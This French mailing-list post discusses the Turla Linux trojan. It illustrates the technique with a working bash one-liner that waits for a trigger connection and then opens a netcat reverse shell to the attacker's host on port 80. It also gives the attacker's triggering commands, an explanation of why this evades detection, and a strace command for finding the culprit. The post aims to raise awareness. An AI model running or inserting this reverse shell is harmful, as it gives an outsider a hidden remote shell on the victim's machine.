[gull] Trojan Turla for Linux
felix
felix at f-hauri.ch
Wed Dec 17 12:09:59 CET 2014
*** Liste Linux Léman ***
On Tue, Dec 16, 2014 at 12:18:42PM +0100, Daniel Cordey wrote:
>
> http://www.linuxinsider.com/story/Turla-Trojan-Unearthed-on-Linux-81460.html
>
Sans chercher à affoler tous le monde...
On peut le démontrer le principe en bash:
Soit le trojan:
$ while :;do netstat -n | grep -q $myfixedip:22 &&
nc $myfixedip 80 -c /bin/bash ; done
et depuis $myfixedip, le pirate utilisera, pour se connecter:
dans une console:
$ nc -l -p 80
et dans une autre:
$ nc -w 3 $targethost 22
.... Le trojan est ``indétectable'' en ce sens que
- il n'a pas de port ouvert en listen.
- le sniffing se fait sans plonger l'interface en mode promiscuous.
- la connexion se faisant de l'intérieur vers un port 80 à l'extérieur,
elle passera pour une simple connection ``surf''.
...
Le seul moyen d'afficher le pid de l'outil qui accède à /proc/net/tcp est
un truc du genre strace:
# strace -ffp $suspectPid 2>&1| sed -une '/proc.*tcp/{p;q}'
Voilà... cela donne à réflechir!
--
Félix Hauri - <felix at f-hauri.ch> - http://www.f-hauri.ch
More information about the gull
mailing list